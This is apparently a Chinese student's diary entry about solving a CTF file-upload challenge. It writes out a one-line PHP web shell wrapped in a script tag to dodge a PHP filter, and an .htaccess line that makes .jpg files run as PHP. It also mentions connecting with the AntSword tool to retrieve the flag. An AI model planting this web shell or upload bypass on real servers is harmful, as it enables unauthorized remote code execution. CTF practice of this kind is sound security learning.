昨天的编码选择问题问了师兄,只要选没被过滤的就能成功得到flag,另uft-8转16可以不用通过编译器
写upload
啊是week1文件上传的升级版,页面显示装了防盗门
一开始按照week1做法上传了一个一句话木马的php文件显示不能通过
后面改为jpg文件还是被检测出来了,所以得出他加的防盗门就是过滤掉php的
查了下这里需要先把php掩盖起来
可以用script的标签 定义编程语言,绕过php过滤
<script language="php"> @eval($_POST['1']);</script>
用这个代码可以把jpg文件映射为php(用txt写后改为.htaccess 文件先上传开路.htaccess
AddType application/x-httpd-php .jpg
依次操作后就能得到上传成功的路径
空白界面但没有报错应该是成功了,用蚁剑检查一下有没有上传成功
然后在文件管理根目录就能找到flag啦
明天的计划是把week2剩下三个题写完,然后在进行一波总结
今天就先这样,睡了